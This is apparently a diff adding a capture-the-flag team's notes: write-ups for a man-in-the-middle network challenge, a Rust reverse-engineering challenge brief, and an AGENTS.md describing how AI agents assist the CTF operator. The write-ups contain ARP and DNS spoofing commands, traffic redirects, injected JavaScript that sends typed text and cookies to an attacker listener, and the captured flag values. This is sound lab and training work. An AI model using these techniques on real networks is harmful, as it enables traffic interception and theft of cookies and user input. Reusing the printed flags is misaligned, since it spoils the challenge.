+The server continues when it receives valid questions (with proper hashes). The only source of valid hashes is the client. Strategy:
+
+1. Intercept server→client: Fix math, keep original hash
+2. Forward client→server unchanged: Client's questions have valid hashes
+3. Hope: Client doesn't verify incoming hashes
+
+```bash
+python3 math_spoof.py
+```
+
+Or echo approach - send previous question instead of INCORRECT:
+```bash
+python3 math_echo.py
+```
+
+## Setup Commands
+```bash
+# Terminal 1 & 2: ARP spoof
+arpspoof -i eth1 -t 10.0.91.132 10.0.91.130 &
+arpspoof -i eth1 -t 10.0.91.130 10.0.91.132 &
+
+# Terminal 3: iptables redirect
+iptables -t nat -A PREROUTING -i eth1 -s 10.0.91.132 -d 10.0.91.130 -p tcp --dport 9000 -j REDIRECT --to-port 9000
+
+# Terminal 4: proxy
+python3 math_echo.py
+```
2026-01-23-PC07-Team-R1/monkey-in-the-middle/token_3.md
@@ -0,0 +1,52 @@
+# Token 3: DNS Domain Token
+
+**Token:** `PCCC-Domain-Name-Simian-02-95yA`
+
+## Objective
+Intercept the DNS request from dnsvictim.pccc and find the token in the first label of the domain name.
+
+## Hosts
+- dnsvictim.pccc: 10.0.91.134
+- dnsmasq.pccc: 10.0.91.133
+
+## Method: ARP Spoof + DNS Capture
+
+### Step 1: Enable IP forwarding
+```bash
+sysctl -w net.ipv4.ip_forward=1
+```
+
+### Step 2: ARP spoof between victim and DNS server
+```bash
+arpspoof -i eth1 -t 10.0.91.134 10.0.91.133 &
+arpspoof -i eth1 -t 10.0.91.133 10.0.91.134 &
+```
+
+### Step 3: Capture DNS traffic
+```bash
+tcpdump -i eth1 -n port 53 -A
+```
+
+Or more specifically:
+```bash
+tcpdump -i eth1 -n 'udp port 53' -l | grep -i pccc
+```
+
+### Step 4: Observe the DNS query
+The victim queries for:
+```
+PCCC-Domain-Name-Simian-02-95yA.target.pccc
+```
+
+The token is the first label (subdomain) of this domain name.
+
+## Why It Works
+DNS queries are sent in plaintext UDP. By ARP spoofing between the victim and DNS server, all DNS traffic flows through your machine where you can observe it.
+
+## Note
+This token uses alternative format `PCCC-some-words-??-????` (hyphens instead of underscores and braces) to be a valid DNS label.
+
+## Cleanup
+```bash
+pkill arpspoof
+```
2026-01-23-PC07-Team-R1/monkey-in-the-middle/token_4.md
@@ -0,0 +1,52 @@
+# Token 4: DNS Followup TCP Token
+
+**Token:** `[CAPTURE VIA NC]`
+
+## Objective
+After a successful DNS lookup, dnsvictim.pccc sends this token to port 9001 at `{token3}.target.pccc`.
+
+## Hosts
+- dnsvictim.pccc: 10.0.91.134
+- dnsmasq.pccc: 10.0.91.133
+- Target domain: PCCC-Domain-Name-Simian-02-95yA.target.pccc
+
+## Method: DNS Spoof + Listen on Port 9001
+
+### Step 1: Set up ARP spoofing
+```bash
+arpspoof -i eth1 -t 10.0.91.134 10.0.91.133 &
+arpspoof -i eth1 -t 10.0.91.133 10.0.91.134 &
+```
+
+### Step 2: Listen on port 9001
+In a separate terminal:
+```bash
+nc -nlvp 9001
+```
+
+### Step 3: Spoof DNS response
+When the victim queries for `PCCC-Domain-Name-Simian-02-95yA.target.pccc`, respond with YOUR IP address (10.0.91.138 or your Kali IP).
+
+Using scapy or dnsspoof:
+```bash
+# Create dns spoof entry
+echo "10.0.91.138 PCCC-Domain-Name-Simian-02-95yA.target.pccc" > /tmp/dns.txt
+dnsspoof -i eth1 -f /tmp/dns.txt
+```
+
+Or use a Python script with scapy to:
+1. Sniff DNS queries
+2. When query matches token3 domain, send spoofed response pointing to your IP
+3. The victim connects to your IP on port 9001 and sends the token
+
+### Step 4: Receive the token
+The token arrives on your netcat listener on port 9001.
+
+## Why It Works
+By spoofing the DNS response, you redirect the victim's connection to your machine. The victim thinks it's connecting to the legitimate server but actually connects to you and sends the token.
+
+## Cleanup
+```bash
+pkill arpspoof
+pkill dnsspoof
+```
2026-01-23-PC07-Team-R1/monkey-in-the-middle/token_5.md
@@ -0,0 +1,54 @@
+# Token 5: HTTP Header Token
+
+**Token:** `PCCC{Header_Thieving_Time_Protocol_14_71CD}`
+
+## Objective
+Find this token in the header of the HTTP request sent by webvictim.pccc.
+
+## Hosts
+- webvictim.pccc: 10.0.91.136
+- web.pccc: 10.0.91.135
+
+## Method: ARP Spoof + HTTP Capture
+
+### Step 1: Enable IP forwarding
+```bash
+sysctl -w net.ipv4.ip_forward=1
+```
+
+### Step 2: ARP spoof between victim and web server
+```bash
+arpspoof -i eth1 -t 10.0.91.136 10.0.91.135 &
+arpspoof -i eth1 -t 10.0.91.135 10.0.91.136 &
+```
+
+### Step 3: Capture HTTP traffic
+```bash
+tcpdump -i eth1 -A -s0 host 10.0.91.136 and port 80
+```
+
+Or use a transparent proxy:
+```bash
+iptables -t nat -A PREROUTING -i eth1 -s 10.0.91.136 -d 10.0.91.135 -p tcp --dport 80 -j REDIRECT --to-port 8080
+socat -v TCP-LISTEN:8080,fork,reuseaddr TCP:10.0.91.135:80
+```
+
+### Step 4: Find the token in User-Agent
+The HTTP request contains:
+```
+GET / HTTP/1.1
+Host: web.pccc
+User-Agent: PCCC{Header_Thieving_Time_Protocol_14_71CD}
+...
+```
+
+The token is in the **User-Agent** header.
+
+## Why It Works
+HTTP traffic is unencrypted. By positioning yourself between the client and server via ARP spoofing, you can read all HTTP headers including custom ones like User-Agent.
+
+## Cleanup
+```bash
+pkill arpspoof
+iptables -t nat -D PREROUTING -i eth1 -s 10.0.91.136 -d 10.0.91.135 -p tcp --dport 80 -j REDIRECT --to-port 8080
+```
2026-01-23-PC07-Team-R1/monkey-in-the-middle/token_6.md
@@ -0,0 +1,61 @@
+# Token 6: Textarea Token
+
+**Token:** `[CAPTURE VIA HTTP INTERCEPT]`
+
+## Objective
+The webvictim.pccc types this token into the textarea on the page retrieved from web.pccc.
+
+## Hosts
+- webvictim.pccc: 10.0.91.136
+- web.pccc: 10.0.91.135
+
+## Method: HTTP Intercept + JavaScript Injection
+
+The victim loads a page with a textarea and types data into it. This data is sent via JavaScript (likely XHR/fetch or form submission).
+
+### Step 1: ARP spoof
+```bash
+arpspoof -i eth1 -t 10.0.91.136 10.0.91.135 &
+arpspoof -i eth1 -t 10.0.91.135 10.0.91.136 &
+```
+
+### Step 2: Set up HTTP proxy
+```bash
+iptables -t nat -A PREROUTING -i eth1 -s 10.0.91.136 -d 10.0.91.135 -p tcp --dport 80 -j REDIRECT --to-port 8080
+```
+
+### Step 3: Intercept and capture POST data
+
+Option A - Passive capture (if form submits):
+```bash
+tcpdump -i eth1 -A -s0 host 10.0.91.136 and port 80 | grep -A20 "POST"
+```
+
+Option B - Active proxy to log all requests:
+Create a proxy that forwards traffic but logs POST bodies.
+
+Option C - Inject JavaScript to exfiltrate:
+Modify the HTML response to include JavaScript that sends textarea content to your server:
+```javascript
+document.getElementById('notes').addEventListener('input', function() {
+ fetch('http://YOUR_IP:8888/?data=' + encodeURIComponent(this.value));
+});
+```
+
+### Step 4: Listen for exfiltrated data
+```bash
+nc -nlvp 8888
+```
+
+## Why It Works
+By intercepting HTTP traffic, you can either:
+1. Passively observe form submissions
+2. Actively inject JavaScript to capture keystrokes and exfiltrate them
+
+The victim's browser executes injected JavaScript, sending the typed data to your server.
+
+## Cleanup
+```bash
+pkill arpspoof
+iptables -t nat -D PREROUTING ...
+```
2026-01-23-PC07-Team-R1/monkey-in-the-middle/token_7.md
@@ -0,0 +1,75 @@
+# Token 7: SameSite Lax Cookie
+
+**Token:** `PCCC{C00k13_B4nd1t_09_13qv}`
+
+## Objective
+Steal the `tokenLax` cookie from webvictim.pccc. The cookie belongs to domain `external.target.pccc` on port 80 and is marked `SameSite: Lax`.
+
+## Hosts
+- webvictim.pccc: 10.0.91.136
+- web.pccc: 10.0.91.135
+- Cookie domain: external.target.pccc
+
+## Understanding SameSite: Lax
+- **Lax** cookies are sent with top-level navigations (clicking links, GET requests)
+- NOT sent with cross-site POST, iframes, or AJAX from different origins
+- To steal: trigger a top-level navigation to external.target.pccc that you control
+
+## Method: DNS Spoof + Cookie Capture
+
+### Step 1: ARP spoof victim ↔ DNS server
+```bash
+arpspoof -i eth1 -t 10.0.91.136 10.0.91.133 &
+arpspoof -i eth1 -t 10.0.91.133 10.0.91.136 &
+```
+
+### Step 2: Spoof DNS for external.target.pccc
+Respond to DNS queries for `external.target.pccc` with your IP:
+```bash
+echo "10.0.91.138 external.target.pccc" > /tmp/dns.txt
+dnsspoof -i eth1 -f /tmp/dns.txt
+```
+
+### Step 3: Set up fake server on port 80
+```bash
+nc -nlvp 80
+```
+
+Or a simple Python HTTP server that logs cookies:
+```python
+from http.server import HTTPServer, BaseHTTPRequestHandler
+
+class Handler(BaseHTTPRequestHandler):
+ def do_GET(self):
+ print("Cookie:", self.headers.get('Cookie'))
+ self.send_response(200)
+ self.end_headers()
+
+HTTPServer(('0.0.0.0', 80), Handler).serve_forever()
+```
+
+### Step 4: Trigger navigation to external.target.pccc
+Inject JavaScript into web.pccc response to redirect:
+```javascript
+window.location = 'http://external.target.pccc/';
+```
+
+Or inject an image/link that causes navigation.
+
+### Step 5: Capture the cookie
+When the victim's browser navigates to external.target.pccc (which resolves to your IP), it sends the Lax cookie with the request:
+```
+Cookie: tokenLax=PCCC{C00k13_B4nd1t_09_13qv}
+```
+
+## Why It Works
+SameSite: Lax allows cookies on top-level navigations. By:
+1. Spoofing DNS to redirect external.target.pccc to your IP
+2. Triggering a navigation to that domain
+3. The browser sends the Lax cookie, which you capture
+
+## Cleanup
+```bash
+pkill arpspoof
+pkill dnsspoof
+```
2026-01-23-PC07-Team-R1/monkey-in-the-middle/token_8.md
@@ -0,0 +1,99 @@
+# Token 8: SameSite Strict Cookie
+
+**Token:** `PCCC{U_R_The_M0nk3y_M4st3r_75_97cS}`
+
+## Objective
+Steal the `tokenStrict` cookie from webvictim.pccc. The cookie belongs to domain `external.target.pccc` on port 80 and is marked `SameSite: Strict`.
+
+## Hosts
+- webvictim.pccc: 10.0.91.136
+- web.pccc: 10.0.91.135
+- Cookie domain: external.target.pccc
+
+## Understanding SameSite: Strict
+- **Strict** cookies are ONLY sent when the request originates from the same site
+- NOT sent on cross-site navigations, even top-level (clicking links from other sites)
+- To steal: the victim must already be ON external.target.pccc OR you need a same-site context
+
+## Method: Full Site Takeover via DNS
+
+The key insight: if you control what external.target.pccc serves, you can make the browser believe it's a same-site request.
+
+### Step 1: ARP spoof victim ↔ DNS server
+```bash
+arpspoof -i eth1 -t 10.0.91.136 10.0.91.133 &
+arpspoof -i eth1 -t 10.0.91.133 10.0.91.136 &
+```
+
+### Step 2: Spoof DNS for external.target.pccc
+```bash
+echo "10.0.91.138 external.target.pccc" > /tmp/dns.txt
+dnsspoof -i eth1 -f /tmp/dns.txt
+```
+
+### Step 3: Serve malicious page on external.target.pccc
+Run a web server on port 80 that serves a page with JavaScript to exfiltrate cookies:
+
+```python
+from http.server import HTTPServer, BaseHTTPRequestHandler
+
+class Handler(BaseHTTPRequestHandler):
+ def do_GET(self):
+ cookie = self.headers.get('Cookie', 'none')
+ print(f"[*] Cookie: {cookie}")
+
+ # Serve page that exfiltrates cookie
+ html = f'''<html>
+<script>
+// Cookie visible here because we ARE external.target.pccc
+fetch('http://10.0.91.138:8888/?cookie=' + encodeURIComponent(document.cookie));
+</script>
+</html>'''
+ self.send_response(200)
+ self.send_header('Content-Type', 'text/html')
+ self.end_headers()
+ self.wfile.write(html.encode())
+
+HTTPServer(('0.0.0.0', 80), Handler).serve_forever()
+```
+
+### Step 4: Listen for exfiltrated data
+```bash
+nc -nlvp 8888
+```
+
+### Step 5: Trigger navigation to external.target.pccc
+Inject into web.pccc to redirect victim:
+```javascript
+window.location = 'http://external.target.pccc/';
+```
+
+### Step 6: Capture the cookie
+1. Victim navigates to external.target.pccc (your IP due to DNS spoof)
+2. Browser is now ON external.target.pccc (same-site context)
+3. Your JavaScript reads `document.cookie` (Strict cookie now accessible)
+4. Exfiltrates to your listener
+
+Captured:
+```
+tokenLax=PCCC{C00k13_B4nd1t_09_13qv}; tokenSecure=PCCC{U_R_The_M0nk3y_M4st3r_75_97cS}
+```
+
+Note: The Strict cookie may be named `tokenSecure` or `tokenStrict` in the actual cookie jar.
+
+## Why It Works
+SameSite: Strict only checks that the request originates from the same site. By spoofing DNS:
+1. You become external.target.pccc
+2. When the victim loads your page, the browser considers it "same-site"
+3. JavaScript running in that context can access the Strict cookie
+4. You exfiltrate it to your server
+
+## Key Difference from Lax
+- **Lax**: Cookie sent on cross-site top-level navigation (just redirect and capture in headers)
+- **Strict**: Cookie NOT sent on cross-site navigation; must execute JavaScript in same-site context to access it
+
+## Cleanup
+```bash
+pkill arpspoof
+pkill dnsspoof
+```
2026-01-23-PC07-Team-R1/purple-road/README.md
@@ -0,0 +1,93 @@
+Arcadian
+
+? Embrace your love of rustic art by reverse-engineering a new digital exhibit at the Palace of Versailles, built with the Rust programming language.
+
+NICE Work Roles
+
+ Vulnerability Analysis
+ Software Security Assessment
+
+NICE Tasks
+
+ T1118: Identify vulnerabilities
+ T1496: Develop reverse engineering tools
+ T1590: Identify programming flaws
+
+Background
+
+? As an art and history enthusiast, you encounter a new digital exhibition while touring the Palace of Heracles. Before you can ask about the mysterious laptop on the podium, your tour guide explains that only those with a taste for Arcadian (rustic) art are 'chosen' to complete the challenge. You are then guided to the laptop and the rest of the tour attendees patiently watch you engage in this one-of-a-kind experience.
+
+In this challenge, you must reverse a Rust binary, discover its hidden tokens, and earn the adoration of the greater art community.
+Getting Started
+
+Downloading The Exhibit To get started, simply navigate to the Arcadian website and download the binary to your preferred operating system to begin the journey.
+
+Permissions Issues If you get an Access Denied message when executing the binary, simply run the following command to activate it: chmod +x arcadian
+
+Tokens
+Initially, you will find the binary does not readily provide tokens for successful actions:
+
+e.g. ✅ TOKEN1: <VALUE>
+
+This is intended by the artist.
+
+You must use your knowledge of reverse engineering functions to extract tokens from the binary in a creative way.
+
+Stages/Acts
+Any team member can jump directly to a specific stage by running the binary with the following command:
+
+./arcadian --stage [1,2,3,4,5]
+
+This will take you directly to a specific stage at any time.
+
+XOR-Shift Algorithm An XOR-Shift in this context is defined as incrementing the position of a byte by one. Please view the example below for clarity:
+
+Base XOR Key: 0xA1
+Word: APPLE
+
+A would be XOR'd with 0xA1
+P would be XOR'd with 0xA2
+P would be XOR'd with 0xA3
+L would be XOR'd with 0xA4
+E would be XOR'd with 0xA5
+
+Objectives
+
+ Find the fragmented token
+ Complete the Dynamic Pointer Maze via automation or reverse-engineering.
+ Capture the memory of the binary (in a timely manner)
+ Examine the misconfigured logic behind an application error.
+ Decrypt ciphertext using an XOR-shift algorithm
+
+System and Tool Credentials
+system/tool location
+Art Exhibit http://exhibit.pccc
+Note
+
+Only the binary downloaded from the exhibit is in-scope for this engagement. The web page and underlying infrastructure is out of scope.
+Token 1 - Act I
+955 points
+
+Repair the fragmented string in stage 1
+Unanswered3 attempts left
+Token 2 - Act II
+955 points
+
+Discovered after completing the DPM (Maze)
+Unanswered3 attempts left
+Token 3 - Act III
+955 points
+
+Use SIGTRAP to retrieve this token from memory during it's decryption routine.
+Unanswered3 attempts left
+Token 4 - Act IV
+955 points
+
+Find the STAGE4_UNLOCK symbol, determine it's offset, and patch it with a '\x00' to produce this token.
+Unanswered3 attempts left
+Token 5 - The Final Act
+1500 points
+
+Decrypt the ciphertext from stage 5 using an XOR-shift algorithm
+Unanswered3 attempts left
+
2026-01-23-PC07-Team-R1/AGENTS.md
@@ -0,0 +1,295 @@
+AGENTS.md
+=========
+
+This document defines the operating contract for **all AI agents** assisting in
+this Capture-The-Flag (CTF) event.
+
+The CTF is **time-limited (4 hours)**, has **limited internet access**, and is
+intentionally scoped. Agents must prioritize **decisive action**, **literal
+interpretation of instructions**, and **fast iteration** over exploration.
+
+
+Mission
+-------
+
+You are assisting a human operator in solving CTF challenges under time
+pressure.
+
+ - Assume challenges are **honest and complete as written**
+ - **Do not enumerate or explore** beyond what is explicitly instructed
+ - Favor **direct solutions** over discovery
+ - The human operator is the **sole executor** inside the challenge environment
+
+
+Operating Model
+---------------
+
+### Out-of-Band Execution
+
+ - Agents **do not run inside the CTF environment**
+
+ - All commands, scripts, and tools must be:
+
+ - **Copy-pasteable**
+ - Runnable in **Kali Linux**
+
+ - The **user acts as the bridge**:
+
+ - Executes commands
+ - Returns outputs
+ - Pastes artifacts back to the agent
+
+
+Decision Bias
+-------------
+
+**Act decisively.**
+
+ - If something is ambiguous, make a reasonable assumption and proceed
+ - State assumptions briefly when they matter
+ - Backtracking is acceptable; hesitation is not
+
+
+Interpretation Rules
+--------------------
+
+ - Follow challenge instructions **literally**
+ - Use **standard domain tooling** where obvious (e.g., pcap → Wireshark/tshark)
+ - **Do not broaden scope** unless explicitly blocked by missing artifacts or
+ malformed data
+ - Enumeration, brute force, scanning, or fuzzing is **forbidden unless the
+ challenge says to do so**
+
+
+Communication Style
+-------------------
+
+Agents must communicate with **concise reasoning**:
+
+ - What is being done
+ - Why (1–3 sentences)
+ - The next concrete action
+
+Avoid:
+
+ - Pedagogy
+ - Long explanations
+ - Internal monologues
+
+
+Modes of Operation
+------------------
+
+Agents operate in **one of two modes**.
+**The mode must be provided explicitly in user text at startup.**
+
+> If no mode is provided, the agent **must stop and ask for it**.
+
+### Mode: User-Aid
+
+Purpose: Assist the user directly during active work.
+
+Characteristics:
+
+ - Short, actionable steps
+ - Single commands or small sequences
+ - Immediate feedback loops
+
+Typical output:
+
+ - “Run this command”
+ - “Look for this marker”
+ - “Paste the output back”
+
+### Mode: Self-Directed
+
+Purpose: Allow the agent to work **in parallel** while the user focuses
+elsewhere.
+
+Characteristics:
+
+ - Agent works ahead independently
+ - Produces **runnable scripts or Go programs**
+ - Minimizes round-trips
+
+#### Self-Directed Mode Requirements (Hard Rules)
+
+Agents **must**:
+
+1. Produce **runnable artifacts** (scripts, Go files), not just suggestions
+
+2. Clearly **annotate expected output**
+
+ - What the user should extract or return
+
+3. **Batch work** to reduce interaction overhead
+
+4. **Fail loudly and informatively**
+
+ - Clear error messages
+ - Obvious exit points
+
+5. Emit **copy-friendly output**
+
+ - Token-shaped values
+ - Easy clipboard extraction
+
+Typical workflow:
+
+ - Agent builds a script
+ - User executes it in the environment
+ - Script prints or copies results
+ - User pastes results back
+ - Agent continues solving
+
+
+Parallelism
+-----------
+
+ - Agents operate with **blind parallelism**
+ - No coordination, locking, or ownership protocol
+ - The user is the only global coordinator
+
+Agents should not hesitate due to possible overlap.
+
+
+Completion Criteria
+-------------------
+
+An agent must stop working when:
+
+1. **A valid token is produced**
+
+ - Matches the expected format exactly
+
+2. **Progress is blocked due to missing requirements**
+
+ - Missing artifact
+ - Malformed input
+ - Contradictory instructions
+
+When blocked:
+
+ - Clearly state **what is missing**
+ - State **what would be needed to continue**
+ - Then stop
+
+Agents must **not** thrash, speculate endlessly, or attempt unrelated
+techniques.
+
+
+Environment Constraints
+-----------------------
+
+### Kali Linux
+
+ - Commands must be compatible with Kali
+
+ - X11 is available
+
+ - Clipboard access:
+
+ - noVNC uses the **primary selection**
+
+ - Import with:
+
+ ~~~~ sh
+ xclip -o
+ ~~~~
+
+ - Export with:
+
+ ~~~~ sh
+ xclip -i
+ ~~~~
+
+### Golang
+
+ - Go version: **1.25.1**
+
+ - Only **standard library + provided modules** may be used
+
+ - Available modules are listed in **Appendix: Golang Modules**
+
+ - Go programs must:
+
+ - Be single-file when possible
+ - Avoid unnecessary dependencies
+ - Print results plainly
+
+
+Provided Documents
+------------------
+
+For each challenge, the user will supply:
+
+ - A challenge directory: `{challenge-number}/`
+ - `README.md` with full challenge text
+ - `artifacts/` directory with extracted materials
+
+Agents must treat these as **authoritative**.
+
+
+Prohibited Actions
+------------------
+
+Agents must not:
+
+ - Enumerate networks, filesystems, or services unless instructed
+ - Attack infrastructure beyond provided artifacts
+ - Assume hidden objectives
+ - Rely on internet access within the CTF environment
+ - The user's system and the agent itself will have internet
+
+
+Appendix: Local Golang Modules
+------------------------------
+
+~~~~
+/home/user/go/pkg/mod/github.com/
+├── agext/levenshtein@v1.2.2
+├── apparentlymart/go-textseg
+├── fatih/color@v1.16.0
+├── golang/protobuf@v1.5.4
+├── google/go-cmp@v0.7.0
+├── hashicorp/go-cty@v1.5.0
+├── hashicorp/go-hclog@v1.6.3
+├── hashicorp/go-plugin@v1.7.0
+├── hashicorp/go-uuid@v1.0.3
+├── hashicorp/go-version@v1.7.0
+├── hashicorp/hcl
+├── hashicorp/logutils@v1.0.0
+├── hashicorp/terraform-plugin-go@v0.29.0
+├── hashicorp/terraform-plugin-log@v0.9.0
+├── hashicorp/terraform-plugin-sdk
+├── hashicorp/terraform-plugin-sdk@v1.17.2
+├── hashicorp/terraform-registry-address@v0.4.0
+├── hashicorp/terraform-svchost@v0.1.1
+├── hashicorp/yamux@v0.1.2
+├── mattn/go-colorable@v0.1.13
+├── mattn/go-isatty@v0.0.20
+├── mitchellh/copystructure@v1.2.0
+├── mitchellh/go-testing-interface@v1.14.1
+├── mitchellh/go-wordwrap@v1.0.1
+├── mitchellh/mapstructure@v1.5.0
+├── mitchellh/reflectwalk@v1.0.2
+├── oklog/run@v1.1.0
+├── vmihailenco/msgpack
+├── vmihailenco/msgpack@v4.0.4+incompatible
+├── vmihailenco/tagparser
+└── zclconf/go-cty@v1.17.0
+
+/home/user/go/pkg/mod/google.golang.org/
+├── appengine@v1.6.8
+├── genproto
+├── grpc@v1.75.1
+└── protobuf@v1.36.9
+
+/home/user/go/pkg/mod/golang.org/x/
+├── mod@v0.27.0
+├── net@v0.43.0
+├── sync@v0.17.0
+├── sys@v0.36.0
+├── text@v0.29.0
+└── tools@v0.36.0
+~~~~